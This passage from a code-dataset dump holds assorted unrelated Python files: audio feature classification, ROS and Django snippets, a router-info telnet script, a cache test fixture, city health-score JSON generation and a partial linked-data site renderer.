tile\n\nclass LabeledTile(tile.Tile):\n\n\tdef __init__(self, size, label='LABEL HERE', tileOrientation='vertical', labelSize=30,\n\t\t\ttiles=[], **kwargs):\n\n\t\tlabelTile = { 'name' : 'label', 'class' : 'TextField', 'size' : labelSize}\n\t\ttiles = [labelTile] + tiles\n\t\tsuper(LabeledTile, self).__init__(size, tiles)\n\t\tself.update(label={'value': label})\n","sub_path":"opencvgui/labeled_tile.py","file_name":"labeled_tile.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"464676911","text":"from django.urls import path\nfrom app_task import views\n\n\nurlpatterns = [\n # 任务列表\n path('task_list/', views.task_list),\n # 添加任务\n path('task_add/', views.task_add),\n # 编辑任务\n path('task_edit//', views.task_edit),\n # 用例节点(树形展示)\n path('case_node/', views.case_node),\n # 保存任务\n path('task_save/', views.task_save),\n # 删除任务\n path('task_delete/', views.task_delete),\n # 运行任务\n path('task_run//', views.task_run),\n # 任务日志\n path('task_log//', views.task_log),\n # 详情日志\n path('details_log/', views.details_log),\n]\n\n","sub_path":"mysite/app_task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"488996617","text":"import unittest\nimport brain\n\n\nclass FnctTest(unittest.TestCase):\n\n def test(self):\n net = brain.NeuralNetwork()\n net.train([\n ([0, 0], [0]),\n ([0, 1], [1]),\n ([1, 0], [1]),\n ([1, 1], [0])\n ])\n print(net.to_function('test_nn'))\n","sub_path":"tests/test_fnct.py","file_name":"test_fnct.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"348449948","text":"import cv2\nimport pandas as pd\nimport numpy as np\nimport scipy.misc\nimport os\nimport sklearn\nimport numpy as np\nfrom sklearn import svm\nimport matplotlib.pyplot as plt\nfrom sklearn import svm\nfrom random import shuffle\nimport tensorflow as tf\nimport matplotlib.image as mpimg\nimport tflearn\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\nfrom tflearn.layers.core import input_data, dropout, fully_connected\nfrom tflearn.layers.estimator import regression\nfrom PIL import Image, ImageDraw, ImageFont\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import SVC\nimport librosa\n\ndef MinLen(L):\n m=90\n for i in L:\n x=len(i)\n if x15:\n d=r-15\n i=np.delete(i, np.s_[-d:], axis=1)\n #i=i[:][:-d]\n NL.append(i)\n else:\n NL.append(i)\n return NL\n\nTRAIN_DIR = 'train'\nTEST_DIR = 'test'\nf=[]\nlabels=[]\nfor a in (os.listdir(TRAIN_DIR)):\n audio_path = os.path.join(TRAIN_DIR, a)\n x , sr = librosa.load(audio_path)\n mfcc = librosa.feature.mfcc(x, sr=sr)\n mfcc = sklearn.preprocessing.scale(mfcc, axis=1)\n f.append(mfcc)\n labels.append(int(a[0]))\nTF=[]\nTlabels=[]\nfor a in (os.listdir(TEST_DIR)):\n audio_path = os.path.join(TEST_DIR, a)\n x , sr = librosa.load(audio_path)\n mfcc = librosa.feature.mfcc(x, sr=sr)\n mfcc = sklearn.preprocessing.scale(mfcc, axis=1)\n TF.append(mfcc)\n Tlabels.append(int(a[0]))\n\nf=Trim(f)\nm=Avg(f)\n\n\nTF=Trim(TF)\ntm=Avg(TF)\n\nX_tarin= np.array(m)\ny_train= labels\n\nX_test= np.array(tm)\ny_test= Tlabels\n\nclf = svm.SVC(gamma=0.001, C=10)\nclf.fit(X_tarin, y_train)\nacc=0\nprediction=clf.predict(X_test)\nfor i in range(len(prediction)):\n if prediction[i]==Tlabels[i]:\n acc+=1\nprint((acc/len(prediction)*100),'%')\n","sub_path":"Speech.py","file_name":"Speech.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"541247643","text":"import os\nimport sys\n\n#init values\noverlap = 1024\nframe_length = 2048\n\nfrom scipy.io import wavfile\n\ndef readAudio(audio):\n fs, amp = wavfile.read(audio)\n dt = 1/fs\n n = len(amp)\n t = dt*n\n\n if t > 1.0:\n amp = amp[int((t/2 - 0.5)/dt):int((t/2 + 0.5)/dt)]\n n = len(amp)\n t = dt*n\n \n return(amp, fs)\n\nimport librosa\nimport librosa.display\nimport numpy as np\nimport cv2\n\ndef makeSpectogram(amp, fs):\n S = librosa.feature.melspectrogram(y=amp*1.0, sr=fs, n_fft=frame_length, hop_length=overlap, power=2.0)\n sepectogram = librosa.power_to_db(S,ref=np.max)\n return cv2.resize(sepectogram.round(3),(64,64)).tolist()\n\ndatadir = \"/home/sywi/Documents/voicePathology/source/CNN/dataset/healthy\"\nfulldir = os.path.join(os.getcwd(), datadir)\nallfiles = os.listdir(fulldir)\n\noutput = {}\noutput['status'] = 0\n\nimport json\n\nfor filename in allfiles:\n filepath = os.path.join(datadir, filename)\n name = filename.split(\".\")[0]\n amp, fs = readAudio(filepath) \n \n output['spectogram'] = makeSpectogram(amp, fs) \n\n completeName = os.path.join('/home/sywi/Documents/voicePathology/source/CNN/data/', name + '.json') \n\n with open(completeName, 'w') as outfile:\n json.dump(output, outfile)\n\n","sub_path":"source/CNN/make_spectrogram.py","file_name":"make_spectrogram.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522271323","text":"BC_PORT=1883\nimport sys\nimport time\nfrom socket import *\ndef broadcas(se,ip):\n se=bytes(se.encode())\n s=socket(AF_INET,SOCK_DGRAM)\n s.bind(('',0))\n s.setsockopt(SOL_SOCKET,SO_BROADCAST,1)\n s.sendto(se,(ip,BC_PORT))\n","sub_path":"proj/pysen.py","file_name":"pysen.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"248080357","text":"\"\"\"Get Router Info\"\"\"\nimport telnet_router\nimport json\ndef get_routers(filename):\n '''\n connect to routers from ip in json_file and return list of TN_ROUTER obj\n [\n {\n \"device\":\"127.0.0.1\", \n \"username\":\"MarinePA\", \n \"password\":\"cisco\", \n \"en_password\":\"class\"\n }, ...\n ]\n '''\n with open(filename, 'r') as json_file:\n add_list = json.loads(json_file.read())\n print(\"Addresses :\" + str(add_list))\n routers = [telnet_router.TN_ROUTER(router['device'], router['username'], \\\n router['password'], router['en_password']) for router in add_list]\n return routers\n\ndef get_routers_info():\n \"\"\"get all router info and save into file\"\"\"\n routers = get_routers('xxx.json')\n routers_info_list = [\\\n {'name':router.get_device_name(), 'spec':router.get_router_spec(), \\\n 'interface':router.get_router_interfaces(), 'routing table':router.get_routing_table()} \\\n for router in routers]\n data = \"\"\n for router_info in routers_info_list:\n data += router_info['name'] + '\\n====Specification====\\n'\n data += router_info['spec'] + '\\n====Interfaces====\\n'\n data += '\\n'.join([''.join([str(k) + \": \" + interfaces[k]]) + '\\n' \\\n for interface in router_info['interface']]) + '\\n====Routing Table====\\n'\n data += router_info['routing table'] + '\\n'\n \n with open('routers_info.txt', 'w') as text_file:\n text_file.write(data)\n \n\nget_routers_info()\n","sub_path":"get_routers_info.py","file_name":"get_routers_info.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"112181325","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport json\n\n##################################################\ndf_corrected_cities_states = pd.read_csv('data/corrected_cities_states_Kelsey.csv')\n\nus_state_abbrev = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'District of Columbia': 'DC',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Northern Mariana Islands': 'MP',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Palau': 'PW',\n 'Pennsylvania': 'PA',\n 'Puerto Rico': 'PR',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virgin Islands': 'VI',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY',\n}\n\ndf_corrected_cities_states = df_corrected_cities_states.rename(columns={'State': 'state',\n 'City': 'metro_name'})\ndf_corrected_cities_states['state_code'] = df_corrected_cities_states.state.map(us_state_abbrev)\n\nmapper_metro_to_metro_name = dict(zip(df_corrected_cities_states.metro_normed,\n df_corrected_cities_states.metro_name))\n\nmapper_metro_to_state = dict(zip(df_corrected_cities_states.metro_normed,\n df_corrected_cities_states.state))\n\nus_state_abbrev = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'District of Columbia': 'DC',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Northern Mariana Islands': 'MP',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Palau': 'PW',\n 'Pennsylvania': 'PA',\n 'Puerto Rico': 'PR',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virgin Islands': 'VI',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY',\n}\n\ndict_state_code_mapper = dict(zip(us_state_abbrev.values(), us_state_abbrev.keys()))\n\n##\nwith open('back_end_dev/dict_data_scaler.pkl', 'rb') as handle:\n dict_data_scaler = pickle.load(handle)\n\n##\ndf = df_corrected_cities_states.copy()\ndf = dict_data_scaler['df_standardized'].copy()\n\ndf['metro_name'] = df.metro_normed.map(mapper_metro_to_metro_name)\ndf['state'] = df.metro_normed.map(mapper_metro_to_state)\ndf['state_code'] = df.state.map(us_state_abbrev)\n\n##\nscaler = dict_data_scaler['scaler']\ndf_dist_min_max = dict_data_scaler['df_dist_min_max']\n\n## new structure of json file\ndf_states_divided = df.copy()\n\ndf_states_divided.sort_values(by=['state', 'metro_name'], inplace=True)\n\ndf_states_divided.loc[:, ['state', 'metro_name']]\n\n##\n\n\n# to create nested dictionary\ndict_final_all_state = {}\nfor state_code in list(df_states_divided['state_code'].unique()):\n df_temp_one_state_code = None\n df_temp_one_state_code = \\\n df_states_divided[df_states_divided['state_code'] == state_code].copy()\n\n df_temp_one_state_code.sort_values(by=['state', 'metro_name'], inplace=True)\n\n ##\n dict_temp_all_metros_in_one_state = {}\n for _, row in df_temp_one_state_code.iterrows():\n dict_temp_metro = dict()\n # print(row['metro_normed'])\n\n # Scores\n dict_metro_scores = {}\n dict_metro_scores['HealthcareCoverage'] = round(1 - float(row['uninsured_ratio']), 2)\n dict_metro_scores['ParkAccessibility'] = round(row['park_access_ratio'], 2)\n dict_metro_scores['AccessToHealthyFood'] = round(row['food_first_pc'], 2)\n dict_metro_scores['EducationLevel'] = round(row['education_weight'], 2)\n dict_metro_scores['CivicEngagement'] = round(row['voters_ratio'], 2)\n\n # Responses\n dict_temp_responses = {}\n\n ##\n map_vote = {0: 'No', 1: 'YES'}\n dict_temp_vote = {}\n for voting_likelihood in [0, 1]:\n dict_temp_vote[map_vote[voting_likelihood]] = \\\n abs(round(voting_likelihood - row['voters_ratio'], 2))\n\n ##\n dict_temp_responses['Vote'] = dict_temp_vote\n\n ##\n dict_temp_fruit = {}\n for fruit_per_day in np.linspace(0.5, 2.0, 4):\n food_first_pc = (11 / 1.5) * (fruit_per_day - 0.5) - 5\n food_first_pc_std = scaler.transform([[0, 0, food_first_pc, 0, 0]])[0][2]\n if food_first_pc_std < 0:\n food_first_pc_std = 0\n if food_first_pc_std > 1:\n food_first_pc_std = 1\n dict_temp_fruit[fruit_per_day] = \\\n abs(round(food_first_pc_std - row['food_first_pc'], 2))\n\n dict_temp_responses['Fruit'] = dict_temp_fruit\n\n ##\n dict_temp_education = {}\n mapper_education = {'LESS THAN 1ST GRADE': 0,\n '1ST, 2ND, 3RD OR 4TH GRADE': 1,\n '5TH OR 6TH GRADE': 2,\n '7TH OR 8TH GRADE': 3,\n '9TH GRADE': 4,\n '10TH GRADE': 5,\n '11TH GRADE': 6,\n '12TH GRADE NO DIPLOMA': 7,\n 'HIGH SCHOOL GRAD-DIPLOMA OR EQUIV (GED)': 8,\n 'SOME COLLEGE BUT NO DEGREE': 9,\n 'ASSOCIATE DEGREE-OCCUPATIONAL/VOCATIONAL': 10,\n 'ASSOCIATEDEGREE-ACADEMICPROGRAM': 11,\n \"BACHELOR'S DEGREE (EX: BA, AB, BS)\": 12,\n \"MASTER'S DEGREE (EX:MA,MS,MEng,MEd, MSW)\": 13,\n \"PROFESSIONAL SCHOOL DEG (EX:MD, DDS, DVM)\": 14,\n \"DOCTORATE DEGREE (EX: PhD, EdD)\": 14}\n for education in ['LESS THAN 1ST GRADE',\n '1ST, 2ND, 3RD OR 4TH GRADE',\n '5TH OR 6TH GRADE',\n '7TH OR 8TH GRADE',\n '9TH GRADE',\n '10TH GRADE',\n '11TH GRADE',\n '12TH GRADE NO DIPLOMA',\n 'HIGH SCHOOL GRAD-DIPLOMA OR EQUIV (GED)',\n 'SOME COLLEGE BUT NO DEGREE',\n 'ASSOCIATE DEGREE-OCCUPATIONAL/VOCATIONAL',\n 'ASSOCIATEDEGREE-ACADEMICPROGRAM',\n \"BACHELOR'S DEGREE (EX: BA, AB, BS)\",\n \"MASTER'S DEGREE (EX:MA,MS,MEng,MEd, MSW)\",\n 'PROFESSIONAL SCHOOL DEG (EX:MD, DDS, DVM)',\n 'DOCTORATE DEGREE (EX: PhD, EdD)']:\n education_rank = mapper_education[education]\n\n ## education_weight varies between 8.056 and 10.49\n education_rank_std = scaler.transform([[0, education_rank, 0, 0, 0]])[0][1]\n\n dict_temp_education[education] = \\\n abs(round(education_rank_std - row['education_weight'], 2))\n\n ##\n dict_temp_responses['Education'] = dict_temp_education\n\n ##\n map_park_access = {0: 'No', 1: 'YES'}\n dict_temp_park_access = {}\n for park_access in [0, 1]:\n dict_temp_park_access[map_park_access[park_access]] = \\\n abs(round(park_access - row['park_access_ratio'], 2))\n\n ##\n dict_temp_responses['Parks'] = dict_temp_park_access\n\n ##\n map_insured = {0: 'No', 1: 'YES'}\n dict_temp_insured = {}\n for insured in [0, 1]:\n uninsured = 1 - insured\n dict_temp_insured[map_insured[insured]] = \\\n abs(round(uninsured - row['uninsured_ratio'], 2))\n\n ##\n dict_temp_responses['Insured'] = dict_temp_insured\n\n ##\n min_distance = round(df_dist_min_max.loc[df_dist_min_max.metro == row['metro_normed'],\n 'distance_least'].values[0], 2)\n max_distance = round(df_dist_min_max.loc[df_dist_min_max.metro == row['metro_normed'],\n 'distance_most'].values[0], 2)\n dict_temp_metro['Min_Max'] = str([min_distance, max_distance])\n dict_temp_metro['Responses'] = dict_temp_responses\n dict_temp_metro['Scores'] = dict_metro_scores\n dict_temp_metro['AVG_Scores'] = round(np.mean(list(dict_metro_scores.values())), 3)\n print(dict_temp_metro['AVG_Scores'])\n\n ##\n dict_temp_all_metros_in_one_state[row['metro_name']] = dict_temp_metro\n\n ##\n dict_final_all_state[state_code] = dict_temp_all_metros_in_one_state\n#####################################################################\n\nlist_all_states = []\nfor s in list(dict_final_all_state.keys()):\n dict_one_state = {}\n dict_one_state[\"Name\"] = dict_state_code_mapper[s]\n dict_one_state[\"Code\"] = s\n list_all_cities_in_one_state = []\n for c in list(dict_final_all_state[s].keys()):\n dict_one_city = {}\n Name = c\n Scores = dict_final_all_state[s][c]['Scores']\n Responses = dict_final_all_state[s][c]['Responses']\n Min_Max = dict_final_all_state[s][c]['Min_Max']\n AVG_Score = dict_final_all_state[s][c]['AVG_Scores']\n dict_one_city[\"Name\"] = Name.split(\"-\")[0].strip().split(\"/\")[-1].strip()\n print(dict_one_city[\"Name\"])\n dict_one_city[\"Code\"] = str.lower(s.strip() + dict_one_city[\"Name\"].replace(\" \", \"\"))\n dict_one_city[\"Scores\"] = Scores\n dict_one_city[\"Responses\"] = Responses\n dict_one_city[\"min_max\"] = Min_Max\n dict_one_city[\"AVG_Score\"] = AVG_Score\n list_all_cities_in_one_state.append(dict_one_city)\n dict_one_state[\"Cities\"] = list_all_cities_in_one_state\n list_all_states.append(dict_one_state)\n\ndict_final = {}\ndict_final[\"States\"] = list_all_states\nlist_final = [dict_final]\n\n######################################################################\nwith open('back_end_dev/json_6_with_avg_score.json', 'w', encoding='utf-8') as f:\n json.dump(list_final, f, ensure_ascii=False)\n","sub_path":"back_end_dev/similarity_calculator_6_with_avgScore.py","file_name":"similarity_calculator_6_with_avgScore.py","file_ext":"py","file_size_in_byte":11351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"31919663","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport json\nimport time\n\nfrom pip_services3_components.cache import ICache\n\nKEY1: str = \"key1\"\nKEY2: str = \"key2\"\nKEY3: str = \"key3\"\nKEY4: str = \"key4\"\nKEY5: str = \"key5\"\nKEY6: str = \"key6\"\n\nVALUE1: str = \"value1\"\nVALUE2: dict = {'val': \"value2\"}\nVALUE3 = datetime.datetime.now()\nVALUE4 = [1, 2, 3, 4]\nVALUE5 = 12345\nVALUE6 = None\n\n\nclass CacheFixture:\n\n def __init__(self, cache: ICache):\n self.__cache = cache\n\n def test_store_and_retrieve(self):\n self.__cache.store(None, KEY1, VALUE1, 5000)\n self.__cache.store(None, KEY2, VALUE2, 5000)\n self.__cache.store(None, KEY3, VALUE3, 5000)\n self.__cache.store(None, KEY4, VALUE4, 5000)\n self.__cache.store(None, KEY5, VALUE5, 5000)\n self.__cache.store(None, KEY6, VALUE6, 5000)\n\n time.sleep(0.5)\n\n val = self.__cache.retrieve(None, KEY1)\n assert val is not None\n assert VALUE1 == val\n\n val = self.__cache.retrieve(None, KEY2)\n assert val is not None\n assert VALUE2['val'] == val['val']\n\n val = self.__cache.retrieve(None, KEY3)\n assert val is not None\n assert json.loads(json.dumps(VALUE3, default=str)) == val\n\n val = self.__cache.retrieve(None, KEY4)\n assert val is not None\n assert len(val) == 4\n assert VALUE4[0] == val[0]\n\n val = self.__cache.retrieve(None, KEY5)\n assert val is not None\n assert VALUE5 == val\n\n val = self.__cache.retrieve(None, KEY6)\n assert val is None\n\n def test_retrieve_expired(self):\n self.__cache.store(None, KEY1, VALUE1, 1000)\n\n time.sleep(1.5)\n\n val = self.__cache.retrieve(None, KEY1)\n\n assert val is None\n\n def test_remove(self):\n self.__cache.store(None, KEY1, VALUE1, 1000)\n\n self.__cache.remove(None, KEY1)\n\n val = self.__cache.retrieve(None, KEY1)\n\n assert val is None\n","sub_path":"test/fixtures/CacheFixture.py","file_name":"CacheFixture.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"619288497","text":"import cv2\nfrom matplotlib import pyplot as plt\nfrom enchant.checker.CmdLineChecker import color\n\nimg = cv2.imread(\"dataset/examples/life-of-brian2.jpg\", cv2.IMREAD_GRAYSCALE)\ncv2.imshow('Always look on the bright side of life', img)\ncv2.waitKey(0)\nhist = cv2.calcHist([img], [0], None, [256], [0, 256])\nplt.plot(hist, color='gray')\n\nimgeq = cv2.equalizeHist(img)\ncv2.imshow('Equalized', imgeq)\ncv2.waitKey(0)\nhist1 = cv2.calcHist([imgeq], [0], None, [256], [0, 256])\nplt.plot(hist1, color='gray')\n\nplt.xlabel('intensidad de iluminacion')\nplt.ylabel('cantidad de pixeles')\nplt.show()\n\ncv2.destroyAllWindows()\n","sub_path":"tip_01_02_a.py","file_name":"tip_01_02_a.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68968","text":"import rclpy\nfrom rclpy.node import Node\n\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\n\n\nclass CmdVelPublisher(Node):\n def __init__(self):\n super().__init__('cmd_vel_publisher')\n self.publisher_ = self.create_publisher(Twist, 'cmd_vel', 10)\n self.msg = Twist()\n self.max_lin = 0.25\n self.max_ang = 1.0\n self.stop_flag = False\n\n def publish_vel(self, vel):\n y = -float(vel['y'])\n x = -float(vel['x'])\n if (y == x == 0.0):\n if not self.stop_flag:\n self.stop_flag = True\n for _ in range(10):\n self.msg.linear.x = y*self.max_lin\n self.msg.angular.z = x*self.max_ang\n self.publisher_.publish(self.msg)\n else:\n return\n else:\n self.stop_flag = False\n self.msg.linear.x = y*self.max_lin\n self.msg.angular.z = x*self.max_ang\n self.publisher_.publish(self.msg)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n minimal_publisher = MinimalPublisher()\n\n rclpy.spin(minimal_publisher)\n\n # Destroy the node explicitly\n # (optional - otherwise it will be done automatically\n # when the garbage collector destroys the node object)\n minimal_publisher.destroy_node()\n rclpy.shutdown()","sub_path":"cmd_vel_joy/cmd_vel_joy/cmd_vel_node.py","file_name":"cmd_vel_node.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233581078","text":"from pyldapi import Renderer, View\nimport requests\nfrom flask import Response, render_template\nfrom lxml import etree\nfrom lxml import objectify\nfrom rdflib import Graph, URIRef, RDF, RDFS, XSD, OWL, Namespace, Literal, BNode\nimport _config as config\nfrom datetime import datetime\nimport json\njson.encoder.FLOAT_REPR = lambda f: (\"%.2f\" % f)\n\n\nclass SiteRenderer(Renderer):\n URI_GA = 'http://pid.geoscience.gov.au/org/ga/geoscienceausralia'\n\n def __init__(self, request, xml=None):\n views = {\n \"pdm\": View(\n \"GA's Public Data Model View\",\n \"Geoscience Australia's Public Data Model ontology\",\n [\"text/html\", \"text/turtle\", \"application/rdf+xml\", \"application/rdf+json\"],\n 'text/html',\n namespace='http://pid.geoscience.gov.au/def/ont/ga/pdm'\n ),\n\n \"nemsr\": View(\n \"The National Environmental Monitoring Sites Register View\",\n \"The National Environmental Monitoring Sites Register\",\n [\"application/vnd.geo+json\"],\n \"application/vnd.geo+json\",\n namespace=\"http://www.neii.gov.au/nemsr\"\n )\n }\n\n self.site_no = request.base_url.split('/')[-1]\n\n super(SiteRenderer, self).__init__(request, config.URI_SITE_INSTANCE_BASE + self.site_no, views, 'pdm')\n\n self.site_type = None\n self.description = None\n self.status = None\n self.entry_date = None\n self.geometry_type = None\n self.centroid_x = None\n self.centroid_y = None\n self.coords = None\n self.not_found = False\n\n if xml is not None: # even if there are values for Oracle API URI and IGSN, load from XML file if present\n self._populate_from_xml_file(xml)\n else:\n self._populate_from_oracle_api()\n\n def validate_xml(self, xml):\n parser = etree.XMLParser(dtd_validation=False)\n\n try:\n etree.fromstring(xml, parser)\n return True\n except Exception:\n print('not valid xml')\n return False\n\n def _make_vocab_uri(self, xml_value, vocab_type):\n from model.lookups import TERM_LOOKUP\n if TERM_LOOKUP[vocab_type].get(xml_value) is not None:\n return TERM_LOOKUP[vocab_type].get(xml_value)\n else:\n return TERM_LOOKUP[vocab_type].get('unknown')\n\n def _make_vocab_alink(self, vocab_uri):\n if vocab_uri is not None:\n if vocab_uri.endswith('/'):\n return '{}'.format(vocab_uri, vocab_uri.split('/')[-2])\n else:\n return '{}'.format(vocab_uri, vocab_uri.split('/')[-1])\n\n def _generate_wkt(self):\n \"\"\"\n Polygon: 8\n Point: 6889\n :return:\n :rtype:\n \"\"\"\n if self.geometry_type == 'Point':\n coordinates = {\n 'srid': 'GDA94',\n 'x': self.x,\n 'y': self.y\n }\n wkt = 'SRID={srid};POINT({x} {y})'.format(**coordinates)\n elif self.geometry_type == 'Polygon':\n start = 'SRID={srid};POLYGON(('.format(srid='GDA94')\n coordinates = ''\n for coord in zip(self.lons, self.lats):\n coordinates += '{} {},'.format(coord[0], coord[1])\n\n coordinates = coordinates[:-1] # drop the final ','\n end = '))'\n wkt = '{start}{coordinates}{end}'.format(start=start, coordinates=coordinates, end=end)\n else:\n wkt = ''\n\n return wkt\n\n def _generate_google_map_js(self):\n if self.geometry_type == 'Point':\n js = '''\n var map = new google.maps.Map(document.getElementById(\"map\"), {\n zoom: 6,\n center: myLatLng\n });\n\n var marker = new google.maps.Marker({\n position: myLatLng,\n map: map,\n title: 'Site %s'\n });\n ''' % self.site_no\n elif self.geometry_type == 'Polygon':\n coords = []\n for coord in zip(self.lons, self.lats):\n coords.append('\\t\\t\\t\\tnew google.maps.LatLng(%06.8f, %06.8f)' % (coord[1], coord[0]))\n # add the last first coordinate pair to end for complete polygon\n coords.append('\\t\\t\\t\\tnew google.maps.LatLng(%06.8f, %06.8f)' % (self.lats[0], self.lons[0]))\n js = '''\n var map = new google.maps.Map(document.getElementById(\"map\"), {\n zoom: 4,\n center: myLatLng\n });\n\n var bboxCoords = new Array(\n%s\n );\n // Construct the polygon.\n var bbox = new google.maps.Polygon({\n paths: bboxCoords,\n strokeColor: '#FF0000',\n strokeOpacity: 0.8,\n strokeWeight: 2,\n fillColor: '#FF0000',\n fillOpacity: 0.35\n });\n\n bbox.setMap(map);\n\n var bounds = new google.maps.LatLngBounds(); \n for (var i=0; i a , ;\n samfl:samplingElevation [ a samfl:Elevation ;\n samfl:elevation \"231.69716\"^^xsd:float ;\n samfl:verticalDatum \"http://spatialreference.org/ref/epsg/4283/\"^^xsd:anyUri ] ;\n geosp:hasGeometry [ \n a geosp:Geometry ;\n geosp:asWKT \"SRID=GDA94;POINT(143.36786389 -25.94903611)\"^^geosp:wktLiteral \n ] .\n\n a sosa:FeatureOfInterest ;\n skos:exactMatch .\n\n rdfs:subClassOf sosa:Sample .\n '''\n # things that are applicable to all model views; the graph and some namespaces\n g = Graph()\n GEO = Namespace('http://www.opengis.net/ont/geosparql#')\n g.bind('geo', GEO)\n\n # URI for this site\n this_site = URIRef(config.URI_SITE_INSTANCE_BASE + self.site_no)\n g.add((this_site, RDF.type, URIRef(self.site_type)))\n g.add((this_site, RDF.type, URIRef('http://www.w3.org/2002/07/owl#NamedIndividual')))\n g.add((this_site, RDFS.label, Literal('Site ' + self.site_no, datatype=XSD.string)))\n g.add((this_site, RDFS.comment, Literal(self.description, datatype=XSD.string)))\n site_geometry = BNode()\n g.add((this_site, GEO.hasGeometry, site_geometry))\n g.add((site_geometry, RDF.type, GEO.Geometry))\n g.add((site_geometry, GEO.asWKT, Literal(self._generate_wkt(), datatype=GEO.wktLiteral)))\n\n return g.serialize(format=self._get_rdf_mimetype(rdf_mime))\n\n def _get_rdf_mimetype(self, rdf_mime):\n return self.RDF_SERIALIZER_MAP[rdf_mime]\n\n def export_html(self, model_view='pdm'):\n \"\"\"\n Exports this instance in HTML, according to a given model from the list of supported models.\n\n :param model_view: string of one of the model view names available for Sample objects ['igsn', 'dc', '',\n 'default']\n :return: HTML string\n \"\"\"\n if model_view == 'pdm':\n view_title = 'PDM Ontology view'\n sample_table_html = render_template(\n 'class_site_pdm.html',\n site_no=self.site_no,\n description=self.description,\n wkt=self._generate_wkt(),\n state=None, # TODO: calculate\n site_type_alink=self._make_vocab_alink(self.site_type),\n entry_date=self.entry_date\n )\n elif model_view == 'prov':\n view_title = 'PROV Ontology view'\n prov_turtle = self.export_rdf('prov', 'text/turtle')\n g = Graph().parse(data=prov_turtle, format='turtle')\n\n sample_table_html = render_template(\n 'class_site_prov.html',\n visjs=self._make_vsjs(g),\n prov_turtle=prov_turtle,\n )\n else: # elif model_view == 'dc':\n view_title = 'Dublin Core view'\n\n sample_table_html = render_template(\n 'class_site_dc.html',\n identifier=self.site_no,\n description=self.description,\n date=self.entry_date,\n type=self.site_type,\n wkt=self._generate_wkt(),\n creator='Geoscience Australia'.format(self.URI_GA),\n publisher='Geoscience Australia'.format(self.URI_GA),\n 